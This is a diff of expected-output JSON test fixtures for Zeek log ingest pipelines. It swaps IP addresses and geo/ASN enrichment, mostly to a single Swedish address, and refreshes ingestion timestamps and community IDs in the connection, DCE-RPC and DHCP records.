@@ -189,30 +194,33 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 3356, + "number": 29518, "organization": { - "name": "Level 3 Parent, LLC" + "name": "Bredband2 AB" } }, - "address": "4.4.2.2", + "address": "89.160.20.156", "port": 38334, "bytes": 103, - "ip": "4.4.2.2", + "ip": "89.160.20.156", "packets": 1 }, "event": { "duration": 76967000, - "ingested": "2021-08-26T12:37:08.253137894Z", - "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"4.4.2.2\",\"id.orig_p\":38334,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", + "ingested": "2021-12-09T13:50:56.388718400Z", + "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CAcJw21BbVedgFnYH5", 
@@ -230,7 +238,7 @@ ], "network": { "protocol": "dns", - "community_id": "1:hWC6cnCoeyQehzquxJQU6Y3Wm3g=", + "community_id": "1:4cXkRTqm06ivkFYCdZrC+CqSISU=", "transport": "udp", "bytes": 309, "packets": 2, @@ -244,15 +252,33 @@ }, "related": { "ip": [ - "192.0.2.205", - "198.51.100.249" + "192.168.2.205", + "89.160.20.156" ] }, "destination": { - "address": "198.51.100.249", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", "bytes": 0, "packets": 0, - "ip": "198.51.100.249" + "ip": "89.160.20.156" }, "zeek": { "session_id": "Cc6NJ3GRlfjE44I3h", @@ -269,14 +295,14 @@ } }, "source": { - "address": "192.0.2.205", + "address": "192.168.2.205", "bytes": 107, "packets": 1, - "ip": "192.0.2.205" + "ip": "192.168.2.205" }, "event": { - "ingested": "2021-08-26T12:37:08.253152215Z", - "original": "{\"ts\":1551399000.57855,\"uid\":\"Cc6NJ3GRlfjE44I3h\",\"id.orig_h\":\"192.0.2.205\",\"id.orig_p\":3,\"id.resp_h\":\"198.51.100.249\",\"id.resp_p\":3,\"proto\":\"icmp\",\"conn_state\":\"OTH\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"orig_pkts\":1,\"orig_ip_bytes\":107,\"resp_pkts\":0,\"resp_ip_bytes\":0,\"tunnel_parents\":[]}", + "ingested": "2021-12-09T13:50:56.388724100Z", + "original": "{\"ts\":1551399000.57855,\"uid\":\"Cc6NJ3GRlfjE44I3h\",\"id.orig_h\":\"192.168.2.205\",\"id.orig_p\":3,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":3,\"proto\":\"icmp\",\"conn_state\":\"OTH\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"orig_pkts\":1,\"orig_ip_bytes\":107,\"resp_pkts\":0,\"resp_ip_bytes\":0,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "Cc6NJ3GRlfjE44I3h", 
@@ -292,7 +318,7 @@ "local_resp" ], "network": { - "community_id": "1:gzTID87+KHoT4RFDSqb5aInTPeg=", + "community_id": "1:/dM6GFGdrMSFfHWWVHXTte26ER4=", "transport": "icmp", "bytes": 107, "packets": 1, @@ -307,32 +333,32 @@ "related": { "ip": [ "10.156.0.2", - "46.101.87.151" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -0.6658, - "lat": 51.5353 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14061, + "number": 29518, "organization": { - "name": "DigitalOcean, LLC" + "name": "Bredband2 AB" } }, - "address": "46.101.87.151", + "address": "89.160.20.156", "port": 443, "bytes": 0, - "ip": "46.101.87.151", + "ip": "89.160.20.156", "packets": 0 }, "zeek": { @@ -354,8 +380,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253166885Z", - "original": "{\"ts\":1617062400.404645,\"uid\":\"CCicIg43lOtCQOxXnb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":56190,\"id.resp_h\":\"46.101.87.151\",\"id.resp_p\":443,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", + "ingested": "2021-12-09T13:50:56.388729900Z", + "original": "{\"ts\":1617062400.404645,\"uid\":\"CCicIg43lOtCQOxXnb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":56190,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CCicIg43lOtCQOxXnb", 
@@ -371,7 +397,7 @@ "local_resp" ], "network": { - "community_id": "1:ziCfaAfpSmrkSIWraOMW2mxUmFc=", + "community_id": "1:H2WP+dwHKIuudV4sjhjnKf3fpGU=", "transport": "tcp", "bytes": 0, "packets": 0, @@ -386,32 +412,32 @@ "related": { "ip": [ "10.156.0.2", - "20.190.160.73" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "NL-NH", - "city_name": "Amsterdam", - "country_iso_code": "NL", - "country_name": "Netherlands", - "region_name": "North Holland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 4.9087, - "lat": 52.3534 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 8075, + "number": 29518, "organization": { - "name": "Microsoft Corporation" + "name": "Bredband2 AB" } }, - "address": "20.190.160.73", + "address": "89.160.20.156", "port": 443, "bytes": 267, - "ip": "20.190.160.73", + "ip": "89.160.20.156", "packets": 4 }, "zeek": { 
@@ -434,8 +460,8 @@ }, "event": { "duration": 103708982, - "ingested": "2021-08-26T12:37:08.253183090Z", - "original": "{\"ts\":1617062100.419397,\"uid\":\"C52mXBCPJ4pPGkhr1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60810,\"id.resp_h\":\"20.190.160.73\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10370898246765137,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", + "ingested": "2021-12-09T13:50:56.388735500Z", + "original": "{\"ts\":1617062100.419397,\"uid\":\"C52mXBCPJ4pPGkhr1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60810,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10370898246765137,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C52mXBCPJ4pPGkhr1", @@ -451,7 +477,7 @@ "local_resp" ], "network": { - "community_id": "1:c8VbaUJYZDhCA0Us2hi3JYTahPI=", + "community_id": "1:nj/OEILzxKH8qUpmYiAisO39EXI=", "transport": "tcp", "bytes": 319, "packets": 5, 
@@ -466,32 +492,32 @@ "related": { "ip": [ "10.156.0.2", - "20.190.160.73" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "NL-NH", - "city_name": "Amsterdam", - "country_iso_code": "NL", - "country_name": "Netherlands", - "region_name": "North Holland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 4.9087, - "lat": 52.3534 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 8075, + "number": 29518, "organization": { - "name": "Microsoft Corporation" + "name": "Bredband2 AB" } }, - "address": "20.190.160.73", + "address": "89.160.20.156", "port": 443, "bytes": 267, - "ip": "20.190.160.73", + "ip": "89.160.20.156", "packets": 4 }, "zeek": { @@ -514,8 +540,8 @@ }, "event": { "duration": 104128838, - "ingested": "2021-08-26T12:37:08.253198430Z", - "original": "{\"ts\":1617062100.419603,\"uid\":\"CTzCky2CyLT5JJvHck\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60804,\"id.resp_h\":\"20.190.160.73\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10412883758544922,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", + "ingested": "2021-12-09T13:50:56.388741200Z", + "original": "{\"ts\":1617062100.419603,\"uid\":\"CTzCky2CyLT5JJvHck\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60804,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10412883758544922,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CTzCky2CyLT5JJvHck", 
@@ -531,7 +557,7 @@ "local_resp" ], "network": { - "community_id": "1:8EPi737PZXW0ZMOuEpsZ0CWS+UY=", + "community_id": "1:Sec7Dn4dO7T9XJjL+suQ90bQqNA=", "transport": "tcp", "bytes": 319, "packets": 5, @@ -546,32 +572,32 @@ "related": { "ip": [ "10.156.0.2", - "20.190.160.73" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "NL-NH", - "city_name": "Amsterdam", - "country_iso_code": "NL", - "country_name": "Netherlands", - "region_name": "North Holland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 4.9087, - "lat": 52.3534 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 8075, + "number": 29518, "organization": { - "name": "Microsoft Corporation" + "name": "Bredband2 AB" } }, - "address": "20.190.160.73", + "address": "89.160.20.156", "port": 443, "bytes": 267, - "ip": "20.190.160.73", + "ip": "89.160.20.156", "packets": 4 }, "zeek": { 
@@ -594,8 +620,8 @@ }, "event": { "duration": 104333878, - "ingested": "2021-08-26T12:37:08.253214584Z", - "original": "{\"ts\":1617062100.419826,\"uid\":\"CIkS28PDxqQnN49m2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60802,\"id.resp_h\":\"20.190.160.73\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10433387756347656,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", + "ingested": "2021-12-09T13:50:56.388746800Z", + "original": "{\"ts\":1617062100.419826,\"uid\":\"CIkS28PDxqQnN49m2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60802,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10433387756347656,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CIkS28PDxqQnN49m2", @@ -611,7 +637,7 @@ "local_resp" ], "network": { - "community_id": "1:D/bWvCWz34T0lAiafMBSMauT08c=", + "community_id": "1:NRiyq2lbQDqRyNJX78PZVf5DAbQ=", "transport": "tcp", "bytes": 319, "packets": 5, @@ -656,7 +682,7 @@ }, "event": { "duration": 26802063, - "ingested": "2021-08-26T12:37:08.253228176Z", + "ingested": "2021-12-09T13:50:56.388752500Z", "original": "{\"ts\":1617062390.563187,\"uid\":\"CezEGe4jeLNkayV976\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":38948,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.02680206298828125,\"orig_bytes\":0,\"resp_bytes\":241,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":269}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -719,7 +745,7 @@ }, "event": { "duration": 25056124, - "ingested": "2021-08-26T12:37:08.253241303Z", + "ingested": "2021-12-09T13:50:56.388758200Z", "original": "{\"ts\":1617062390.563442,\"uid\":\"CKSr3w18mmW6t7bXC4\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":40080,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.025056123733520509,\"orig_bytes\":0,\"resp_bytes\":276,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":304}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -782,7 +808,7 @@ }, "event": { "duration": 3319979, - "ingested": "2021-08-26T12:37:08.253258868Z", + "ingested": "2021-12-09T13:50:56.388762200Z", "original": "{\"ts\":1617062390.667048,\"uid\":\"CGUiHy4kLIF2ml95eg\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41407,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.003319978713989258,\"orig_bytes\":0,\"resp_bytes\":133,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -845,7 +871,7 @@ }, "event": { "duration": 1111984, - "ingested": "2021-08-26T12:37:08.253273597Z", + "ingested": "2021-12-09T13:50:56.388767100Z", "original": "{\"ts\":1617062390.698943,\"uid\":\"CAOZZi4Qrio7gUVgVc\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":50487,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0011119842529296876,\"orig_bytes\":0,\"resp_bytes\":202,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":230}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -908,7 +934,7 @@ }, "event": { "duration": 908852, - "ingested": "2021-08-26T12:37:08.253287095Z", + "ingested": "2021-12-09T13:50:56.388772200Z", "original": "{\"ts\":1617062390.699227,\"uid\":\"Chx5fs3xQ5ALB72i4e\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":49647,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0009088516235351563,\"orig_bytes\":0,\"resp_bytes\":145,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":173}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -970,7 +996,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253306054Z", + "ingested": "2021-12-09T13:50:56.388777Z", "original": "{\"ts\":1617062400.703865,\"uid\":\"C3pPjh1YRYcVDiZD3\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44944,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1031,7 +1057,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253319736Z", + "ingested": "2021-12-09T13:50:56.388780800Z", "original": "{\"ts\":1617062400.703851,\"uid\":\"ChUxTmYLG37oO5qUb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44942,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -1092,7 +1118,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-26T12:37:08.253332989Z", + "ingested": "2021-12-09T13:50:56.388785300Z", "original": "{\"ts\":1617062400.704467,\"uid\":\"CpeAOT3B11CTXJgzw2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44946,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1124,24 +1150,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", + "address": "89.160.20.156", "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "89.160.20.156", "packets": 1 }, "zeek": { @@ -1157,24 +1186,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 3356, + "number": 29518, "organization": { - "name": "Level 3 Parent, LLC" + "name": "Bredband2 AB" } }, - "address": "4.4.2.2", + "address": "89.160.20.156", "port": 38334, "bytes": 103, - "ip": "4.4.2.2", + "ip": "89.160.20.156", "packets": 1 }, "tags": [ 
@@ -1184,7 +1216,7 @@
 ],
 "network": {
 "protocol": "dns",
- "community_id": "1:hWC6cnCoeyQehzquxJQU6Y3Wm3g=",
+ "community_id": "1:4cXkRTqm06ivkFYCdZrC+CqSISU=",
 "transport": "udp",
 "bytes": 309,
 "packets": 2,
@@ -1196,8 +1228,7 @@
 },
 "related": {
 "ip": [
- "4.4.2.2",
- "8.8.8.8"
+ "89.160.20.156"
 ]
 },
 "host": {
@@ -1205,8 +1236,8 @@
 },
 "event": {
 "duration": 76967000,
- "ingested": "2021-08-26T12:37:08.253346340Z",
- "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"4.4.2.2\",\"id.orig_p\":38334,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}",
+ "ingested": "2021-12-09T13:50:56.388791300Z",
+ "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CAcJw21BbVedgFnYH5",
@@ -1226,30 +1257,15 @@
 "related": {
 "ip": [
 "10.0.2.15",
- "172.217.9.68"
+ "172.16.9.68"
 ]
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 15169,
- "organization": {
- "name": "Google LLC"
- }
- },
- "address": "172.217.9.68",
+ "address": "172.16.9.68",
 "port": 80,
 "bytes": 0,
- "ip": "172.217.9.68",
- "packets": 0
+ "packets": 0,
+ "ip": "172.16.9.68"
 },
 "zeek": {
 "session_id": "C2KP1V3alRLoxl4JB9",
@@ -1270,8 +1286,8 @@
 "ip": "10.0.2.15"
 },
 "event": {
- "ingested": "2021-08-26T12:37:08.253359559Z",
- "original": "{\"ts\":\"2021-06-09T20:55:13.160328Z\",\"uid\":\"C2KP1V3alRLoxl4JB9\",\"id.orig_h\":\"10.0.2.15\",\"id.orig_p\":46408,\"id.resp_h\":\"172.217.9.68\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}",
+ "ingested": "2021-12-09T13:50:56.388795400Z",
+ "original": "{\"ts\":\"2021-06-09T20:55:13.160328Z\",\"uid\":\"C2KP1V3alRLoxl4JB9\",\"id.orig_h\":\"10.0.2.15\",\"id.orig_p\":46408,\"id.resp_h\":\"172.16.9.68\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "C2KP1V3alRLoxl4JB9",
@@ -1287,7 +1303,7 @@
 "local_resp"
 ],
 "network": {
- "community_id": "1:DzqI9CYXjMSYV8VoSAHtMNfMIeU=",
+ "community_id": "1:BpfDLJrzNMSM1hdv6f9vMTJQSW4=",
 "transport": "tcp",
 "bytes": 0,
 "packets": 0,
diff --git a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json
index 4adc103fc6b..a8a9d8bf689 100644
--- a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json
+++ b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json
@@ -31,7 +31,7 @@
 "ip": "172.16.133.6"
 },
 "event": {
- "ingested": "2021-08-11T19:18:23.868060300Z",
+ "ingested": "2021-12-09T13:50:58.323937300Z",
 "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -102,7 +102,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:23.868075800Z",
+ "ingested": "2021-12-09T13:50:58.323944800Z",
 "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json
index 23872a3ee32..8c7578663fc 100644
--- a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json
+++ b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json
@@ -63,7 +63,7 @@
 "address": "192.168.199.132"
 },
 "event": {
- "ingested": "2021-08-11T19:18:24.271234400Z",
+ "ingested": "2021-12-09T13:50:58.676860500Z",
 "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -139,7 +139,7 @@
 "address": "10.156.0.2"
 },
 "event": {
- "ingested": "2021-08-11T19:18:24.271245700Z",
+ "ingested": "2021-12-09T13:50:58.676864400Z",
 "original": "{\"ts\":1617088722.072416,\"uids\":[\"Ck0tsG4wsJxI3lIEZ\"],\"client_addr\":\"10.156.0.2\",\"server_addr\":\"169.254.169.254\",\"mac\":\"42:01:0a:9c:00:02\",\"domain\":\"c.elastic-sa.internal\",\"assigned_addr\":\"10.156.0.2\",\"lease_time\":86400.0,\"msg_types\":[\"ACK\"],\"duration\":0.0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -227,7 +227,7 @@
 "address": "192.168.199.132"
 },
 "event": {
- "ingested": "2021-08-11T19:18:24.271254Z",
+ "ingested": "2021-12-09T13:50:58.676870800Z",
